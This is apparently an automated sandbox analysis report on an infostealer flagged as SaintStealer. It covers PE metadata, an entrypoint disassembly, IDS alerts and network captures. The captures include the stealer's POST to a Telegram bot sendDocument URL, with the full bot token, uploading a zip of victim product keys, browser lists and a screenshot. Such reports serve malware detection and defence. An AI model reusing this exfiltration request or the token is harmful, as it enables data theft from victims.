                                                                                              SHA512:e02797980f11075715499878f06cfcb71a12da81f8b62f7c30deb31b831137472c450b95f5ebe9349a4205041b6f65c6468d217c2fa36a91902f75c7d5aed549
                                                                                              SSDEEP:3072:oBYHQAFbcjCdDK8l8wqxrytfAndlzFvxHebZ5h2jgSw6KXwApEnB:oBYHjajw5lB2LzdxHeblqk6K
                                                                                              TLSH:27F34C6833FD4A19F3BF4A3998B4919046BAF9A56933D75D598030FC2A327C1DA10B73
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5............."...0.................. ........@.. ....................................`................................

                                                                                              File Icon

                                                                                              Icon Hash:90cececece8e8eb0

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x42a602
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0xB880F835 [Fri Feb 3 01:58:13 2068 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              jmp dword ptr [00402000h]
                                                                                              push ecx
                                                                                              hlt
                                                                                              cmpsd
                                                                                              push eax
                                                                                              jle 00007F675CE9F4E3h
                                                                                              push ebx
                                                                                              sbb dl, byte ptr [edi]
                                                                                              movsb
                                                                                              ret
                                                                                              cmp ah, byte ptr [edi]
                                                                                              pop esi
                                                                                              xchg eax, esi
                                                                                              cmp ebp, dword ptr [ebx-62E03495h]
                                                                                              inc ebp
                                                                                              int1
                                                                                              lodsb
                                                                                              cli
                                                                                              pop eax
                                                                                              stosd
                                                                                              dec ebx
                                                                                              jecxz 00007F675CE9F4A5h
                                                                                              xchg eax, ebx
                                                                                              and byte ptr [eax], dh
                                                                                              cli
                                                                                              push ebp
                                                                                              lodsd
                                                                                              jbe 00007F675CE9F50Fh
                                                                                              test byte ptr [eax-0A6E8934h], 00000002h
                                                                                              dec esp
                                                                                              and eax, FCD7E54Fh
                                                                                              lds ebp, fword ptr [edx]
                                                                                              retf
                                                                                              xlatb
                                                                                              xor eax, 62B58044h
                                                                                              mov dword ptr [5AB1DE8Fh], eax
                                                                                              dec ecx
                                                                                              and eax, 45671BBAh
                                                                                              jmp far E1C0h : FE5D980Eh
                                                                                              ret
                                                                                              das
                                                                                              jne 00007F675CE9F4A4h
                                                                                              or dword ptr [eax+esi*8+12h], A397468Dh
                                                                                              imul edx, ebx, F9h
                                                                                              mov byte ptr [ebx], FFFFFF8Fh
                                                                                              pop edi
                                                                                              out 15h, eax
                                                                                              xchg eax, edx
                                                                                              pushfd
                                                                                              xchg eax, ebp
                                                                                              mov edi, 95EB7A6Dh
                                                                                              push edx
                                                                                              pop ecx
                                                                                              fcmovbe st(0), st(4)
                                                                                              mov esi, 74582D83h
                                                                                              and ebx, edx
                                                                                              dec ecx
                                                                                              loopne 00007F675CE9F50Bh
                                                                                              sub dword ptr [esi+7544C8C9h], ecx
                                                                                              retn 6A89h
                                                                                              hlt
                                                                                              mov seg?, word ptr [ecx+78h]
                                                                                              cdq
                                                                                              pop eax
                                                                                              imul esp, dword ptr [edi], B9h
                                                                                              jno 00007F675CE9F47Fh
                                                                                              mov esi, F0B64FE1h
                                                                                              mov byte ptr [ebp-53DF36E9h], ch
                                                                                              jnl 0000F471h
                                                                                              cmp dh, byte ptr [ebx-1AE7B521h]
                                                                                              sbb dh, byte ptr [ecx]
                                                                                              adc byte ptr [edi+62603351h], 00000053h
                                                                                              jnle 00007F675CE9F4E7h
                                                                                              mov cl, 64h
                                                                                              jnbe 00007F675CE9F482h
                                                                                              mov ebx, FE84AE6Bh
                                                                                              and dword ptr [eax+2B08F91Ch], 00487094h

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2a5b00x4f.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x5d0.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e0000xc.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x2a5140x38.text
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x20000x290680x2920076b77f85cd4aa4ab9dddb98589135befFalse0.4165202317629179data5.80755836163704IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rsrc0x2c0000x5d00x600f08edb0240cdcebdcca1b93f0f59732aFalse0.4427083333333333data4.28181878845981IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0x2e0000xc0x2000f9136305b308c6636cd9d39e281f797False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_VERSION0x2c0900x340data0.45072115384615385
                                                                                              RT_MANIFEST0x2c3e00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                              Imports

                                                                                              DLLImport
                                                                                              mscoree.dll_CorExeMain

                                                                                              Network Behavior

                                                                                              Suricata IDS Alerts

                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-12-17T19:54:43.109091+01002843856ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M21192.168.11.2049757149.154.167.220443TCP
                                                                                              2024-12-17T19:54:44.188399+01002039009ET MALWARE Win32/SaintStealer CnC Response1149.154.167.220443192.168.11.2049757TCP

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 17, 2024 19:54:36.143249035 CET4975680192.168.11.20104.16.184.241
                                                                                              Dec 17, 2024 19:54:36.278567076 CET8049756104.16.184.241192.168.11.20
                                                                                              Dec 17, 2024 19:54:36.278779984 CET4975680192.168.11.20104.16.184.241
                                                                                              Dec 17, 2024 19:54:36.278979063 CET4975680192.168.11.20104.16.184.241
                                                                                              Dec 17, 2024 19:54:36.413717031 CET8049756104.16.184.241192.168.11.20
                                                                                              Dec 17, 2024 19:54:36.455025911 CET8049756104.16.184.241192.168.11.20
                                                                                              Dec 17, 2024 19:54:36.496998072 CET4975680192.168.11.20104.16.184.241
                                                                                              Dec 17, 2024 19:54:42.186014891 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:42.186033010 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:42.186263084 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:42.194519997 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:42.194530010 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:42.701729059 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:42.701934099 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:42.706684113 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:42.706697941 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:42.707202911 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:42.739449024 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:42.739917040 CET4975680192.168.11.20104.16.184.241
                                                                                              Dec 17, 2024 19:54:42.786207914 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:42.875387907 CET8049756104.16.184.241192.168.11.20
                                                                                              Dec 17, 2024 19:54:42.875556946 CET4975680192.168.11.20104.16.184.241
                                                                                              Dec 17, 2024 19:54:43.107464075 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.107474089 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.108421087 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.108428955 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.108549118 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.108558893 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.108591080 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.108597994 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.108644009 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.108644009 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.108654976 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.108659029 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.108825922 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.108825922 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.108827114 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.108838081 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.108844042 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.108846903 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.108849049 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.108853102 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.109019041 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109019041 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109019041 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109030008 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.109035015 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.109039068 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.109040976 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109045982 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.109196901 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109206915 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.109380007 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109380007 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109380007 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109390974 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.109397888 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109416008 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.109424114 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.109560013 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109560013 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109560013 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109572887 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.109577894 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.109580994 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.109584093 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109584093 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109590054 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.109600067 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.109750032 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109750032 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109750032 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109761953 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.109766960 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.109770060 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.109910011 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109920025 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.109925985 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109925985 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.109936953 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.109941006 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.110095978 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.110095978 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.110095978 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:43.110106945 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.110110998 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.110114098 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.177700996 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:43.229851007 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:44.188199997 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:44.188280106 CET44349757149.154.167.220192.168.11.20
                                                                                              Dec 17, 2024 19:54:44.188453913 CET49757443192.168.11.20149.154.167.220
                                                                                              Dec 17, 2024 19:54:44.189275026 CET49757443192.168.11.20149.154.167.220

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 17, 2024 19:54:35.995146036 CET6390353192.168.11.201.1.1.1
                                                                                              Dec 17, 2024 19:54:36.137656927 CET53639031.1.1.1192.168.11.20
                                                                                              Dec 17, 2024 19:54:36.486321926 CET6169253192.168.11.201.1.1.1
                                                                                              Dec 17, 2024 19:54:36.623277903 CET53616921.1.1.1192.168.11.20
                                                                                              Dec 17, 2024 19:54:42.047708988 CET5830853192.168.11.201.1.1.1
                                                                                              Dec 17, 2024 19:54:42.184120893 CET53583081.1.1.1192.168.11.20

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Dec 17, 2024 19:54:35.995146036 CET192.168.11.201.1.1.10xbdbStandard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                                                              Dec 17, 2024 19:54:36.486321926 CET192.168.11.201.1.1.10x28ceStandard query (0)90.168.9.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                              Dec 17, 2024 19:54:42.047708988 CET192.168.11.201.1.1.10xb94bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Dec 17, 2024 19:54:36.137656927 CET1.1.1.1192.168.11.200xbdbNo error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                                                              Dec 17, 2024 19:54:36.137656927 CET1.1.1.1192.168.11.200xbdbNo error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                                                              Dec 17, 2024 19:54:36.623277903 CET1.1.1.1192.168.11.200x28ceName error (3)90.168.9.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                              Dec 17, 2024 19:54:42.184120893 CET1.1.1.1192.168.11.200xb94bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • api.telegram.org
                                                                                              • icanhazip.com

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.11.2049756104.16.184.241804524C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 17, 2024 19:54:36.278979063 CET63OUTGET / HTTP/1.1
                                                                                              Host: icanhazip.com
                                                                                              Connection: Keep-Alive
                                                                                              Dec 17, 2024 19:54:36.455025911 CET538INHTTP/1.1 200 OK
                                                                                              Date: Tue, 17 Dec 2024 18:54:36 GMT
                                                                                              Content-Type: text/plain
                                                                                              Content-Length: 16
                                                                                              Connection: keep-alive
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Methods: GET
                                                                                              Set-Cookie: __cf_bm=UchbMD0G48zV7fm4tvOOW2fzibBXQ_CGaPlJSgVpxbY-1734461676-1.0.1.1-HxB0DKu7Nd.jeMIf_y602p78vhaEg3hzNqLUg2tLZju6ddFSWzRY_06z2gDs_Pa5xwuZwTnlXdLDBQNEAol8OQ; path=/; expires=Tue, 17-Dec-24 19:24:36 GMT; domain=.icanhazip.com; HttpOnly
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f391f652e9e32e0-JAX
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0a
                                                                                              Data Ascii: 102.129.152.205


                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.11.2049757149.154.167.2204434524C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-17 18:54:42 UTC259OUTPOST /bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocument HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary="2c67de8b-644a-4406-b045-374572e7377e"
                                                                                              Host: api.telegram.org
                                                                                              Content-Length: 120588
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              2024-12-17 18:54:43 UTC40OUTData Raw: 2d 2d 32 63 36 37 64 65 38 62 2d 36 34 34 61 2d 34 34 30 36 2d 62 30 34 35 2d 33 37 34 35 37 32 65 37 33 37 37 65 0d 0a
                                                                                              Data Ascii: --2c67de8b-644a-4406-b045-374572e7377e
                                                                                              2024-12-17 18:54:43 UTC131OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 45 4e 5d 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 25 35 42 45 4e 25 35 44 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 2e 7a 69 70 0d 0a 0d 0a
                                                                                              Data Ascii: Content-Disposition: form-data; name=document; filename="[EN]102.129.152.205.zip"; filename*=utf-8''%5BEN%5D102.129.152.205.zip
                                                                                              2024-12-17 18:54:43 UTC4096OUTData Raw: 50 4b 03 04 14 00 00 00 08 00 d1 6e 91 59 ab 48 79 56 1f 00 00 00 1d 00 00 00 0e 00 00 00 50 72 6f 64 75 63 74 4b 65 79 2e 74 78 74 0b f0 f2 f5 30 d3 f5 f3 f2 8e f0 d5 0d 74 f6 0d 8f d4 75 0a f0 8a f0 d2 0d 09 72 f6 f5 00 00 50 4b 03 04 14 00 00 00 08 00 d1 6e 91 59 f5 d4 84 f6 e6 00 00 00 dc 02 00 00 15 00 00 00 49 6e 73 74 61 6c 6c 65 64 42 72 6f 77 73 65 72 73 2e 74 78 74 ed 90 31 6f 83 30 10 85 67 f3 2b 3c 26 8b e5 03 84 a0 5b 12 a5 55 86 54 99 da c5 8b 45 0e 62 c9 70 c8 10 09 f5 d7 f7 8a 95 4a 2d 73 b7 4e b6 de 7b fe fc ee 5e 6d 87 e2 62 a7 9b 78 c3 30 3a ea 93 33 7d 38 ef ad 7c 76 01 1b 9a c5 e1 c9 5c 02 b5 c1 76 2c 79 1c cd af 80 69 e2 a9 70 46 51 81 d2 0a 92 17 a2 d6 a3 3c dc 02 31 7e 45 88 b6 89 b6 d9 0d 83 77 b5 9d f8 73 53 2f d2 82 82 b4 64 56
                                                                                              Data Ascii: PKnYHyVProductKey.txt0turPKnYInstalledBrowsers.txt1o0g+<&[UTEbpJ-sN{^mbx0:3}8|v\v,yipFQ<1~EwsS/dV
                                                                                              2024-12-17 18:54:43 UTC4096OUTData Raw: 05 80 5a 54 4d 47 aa 06 50 dc 96 4f 2a 23 88 c4 c8 83 e6 ca b4 c1 dc 7b f8 e4 f0 61 22 9b 03 eb ce 98 1c f1 3c 24 91 7a ec 07 25 4b 5b 3b a1 93 46 14 29 25 a9 86 f4 17 72 bc 53 a5 91 b0 0a 3f a4 a0 30 82 40 40 2d 94 83 59 2f e3 e4 3c 92 75 d3 70 72 33 52 21 36 6b 93 e6 4e 2f 00 5c a7 92 f9 87 04 b4 de c2 69 66 e6 cb e8 51 17 29 df 55 ea 0c db 2f ca 56 e1 c3 91 f0 8a 90 57 99 c4 1b c2 02 fc e9 16 87 05 a1 8b 52 e8 17 ce c6 24 ab 24 64 92 06 a0 cb 50 e9 ed a0 0e 83 d8 f1 52 38 c9 58 d8 ca 50 29 8d 7b 19 3b 30 9b 11 83 b5 e1 39 c2 05 a9 46 76 28 76 67 7a 93 ed 28 7d 9e b1 e8 81 64 22 d6 05 e9 20 6a e7 00 a8 7c e5 6d 47 46 54 60 33 8c 3d ed 9f 9d a6 c5 d4 19 22 1d 4a 96 c0 da 17 fe 07 e9 69 de 38 02 68 9f 59 00 f7 97 8e 4a 7c 61 56 55 82 5c bb 29 04 f0 bf 93
                                                                                              Data Ascii: ZTMGPO*#{a"<$z%K[;F)%rS?0@@-Y/<upr3R!6kN/\ifQ)U/VWR$$dPR8XP){;09Fv(vgz(}d" j|mGFT`3="Ji8hYJ|aVU\)
                                                                                              2024-12-17 18:54:43 UTC4096OUTData Raw: 96 59 4f 43 84 a8 ca 6a fe 34 3c c8 a5 56 86 b7 e9 4a 35 88 9e 69 7b 4f 9e 74 2a 7c e0 62 96 29 d6 00 42 a6 0c fd 56 e1 a7 03 9d 56 91 92 23 88 2e 33 47 16 18 6e 24 cb 98 2a 8a a1 ec 82 f9 a4 54 d1 ea eb a2 3e b0 1d 56 b1 6d 16 ee bd 35 09 a9 52 0d 41 3c 4e 6a 80 20 62 45 54 4b 26 7b 00 b4 00 9c cb a0 b4 45 57 30 99 13 7c 3b 29 a8 13 35 40 16 06 99 bc 7d b9 81 5c ec 24 e6 3e b6 b2 ea 10 6b b1 64 77 5e 73 44 7d 00 2f f9 6e 9b 2e 92 c2 0e 0e 27 30 bc 03 5b 67 53 cc da 89 c4 76 84 81 c3 2c 54 58 6e f2 92 ef d2 42 78 95 11 3f 35 da 95 d9 aa b2 71 86 18 43 ab 41 f5 cf 2c ae c1 13 ec 43 42 a2 26 1a 80 c4 dc b3 9d e3 69 1d b7 d0 ac c3 c7 4d ff e2 3e a2 f3 ac dd 10 41 f1 ec 2b d1 c8 6a 8f 9c 3d d9 ae b5 16 ab bf c5 59 d9 ae cb 32 d9 91 61 78 3c e5 c6 17 8f 8c 3f
                                                                                              Data Ascii: YOCj4<VJ5i{Ot*|b)BVV#.3Gn$*T>Vm5RA<Nj bETK&{EW0|;)5@}\$>kdw^sD}/n.'0[gSv,TXnBx?5qCA,CB&iM>A+j=Y2ax<?
                                                                                              2024-12-17 18:54:43 UTC4096OUTData Raw: 7d 13 6f 88 b3 03 1d e4 20 ca bf 35 13 c4 43 bb 67 42 7a 3c dc 1c eb 30 26 d6 4f 35 40 6a c1 d1 1d 47 4d ce ac 1f f0 5e 92 59 ff 0f c2 74 21 b2 ec 2f 6f 2c d9 bf 0b 8c 67 73 11 71 ae 20 aa 04 8c 7f 81 10 07 30 6a 6b 97 1a 31 8b b4 d1 73 01 46 9b 40 06 3f 0b c1 78 6e 8a fd 51 2f 65 ac 2d 50 5e e0 db 01 46 f6 d8 9f b1 fe 7f 3e de fa 88 bc 40 c8 ec 44 67 66 d6 6c 32 36 cf ff d4 fd d2 b5 b2 e5 ed de 1b bf 52 16 ec 9f f0 36 a3 c9 e0 01 8e fe 01 57 61 77 5a 77 12 5d dd ce 0e e0 76 5c b0 e8 2e 38 14 80 2f 8b 74 f8 2b e2 bf 0a ab 1f d5 5d 34 99 56 86 ae d3 4b bb f4 a3 54 2b dd 6d a3 b6 33 73 c5 5b 5e 5a 29 3a 17 a2 7f 50 cd 7f d5 d2 e6 3f d7 46 01 6d 27 4d c3 59 45 69 3d 73 d5 01 c5 88 c3 d4 50 70 5c 0b b5 6b a3 08 a0 0b 1b 8e 03 83 72 a5 b6 78 1a 79 9b b9 e8 f0
                                                                                              Data Ascii: }o 5CgBz<0&O5@jGM^Yt!/o,gsq 0jk1sF@?xnQ/e-P^F>@Dgfl26R6WawZw]v\.8/t+]4VKT+m3s[^Z):P?Fm'MYEi=sPp\krxy
                                                                                              2024-12-17 18:54:43 UTC4096OUTData Raw: 22 55 92 e8 74 a9 b3 94 87 1c b7 13 81 62 a1 af 63 f6 3b 65 81 cb 6b bc 4a 21 c8 e4 4b bd 3a 28 41 a1 70 31 ad 72 31 7f 5a c6 1a 82 1f 92 8e 7a c2 2c 84 7d 9d 59 f3 49 a8 5e 75 69 46 36 38 14 50 5b 7c 27 84 04 f9 a6 52 18 af f2 eb aa 88 52 17 f1 10 c5 9e d0 12 2e cd ed 99 c8 76 9e 6f c7 3f d4 0e 2b 80 0d e2 23 dc 6d a6 29 37 fd 92 8c a5 34 19 70 91 6d d5 87 40 11 67 94 b7 87 5c 54 58 7d 45 e6 49 99 81 f5 4b d9 94 8c 19 2f d7 49 17 76 77 2b fc 7b 26 46 d2 25 ce f3 ed 15 a2 9b 09 4c 55 9b 44 4d 16 88 9d de 8b 0b 5c 32 e2 24 3d 7e 1b 5b 48 ea e4 85 40 9c cc 4e bb a2 9c 41 51 34 03 56 65 66 89 cd e8 0b b0 aa fd 82 29 b3 50 a9 d4 13 94 b2 29 d5 4c 28 d7 31 97 87 33 a4 a0 7d f3 16 0b b9 1c d8 2d f5 cd 58 e7 97 37 d3 de cb 44 54 5b 25 1e ae a7 75 6b c2 06 2b 7f
                                                                                              Data Ascii: "Utbc;ekJ!K:(Ap1r1Zz,}YI^uiF68P[|'RR.vo?+#m)74pm@g\TX}EIK/Ivw+{&F%LUDM\2$=~[H@NAQ4Vef)P)L(13}-X7DT[%uk+
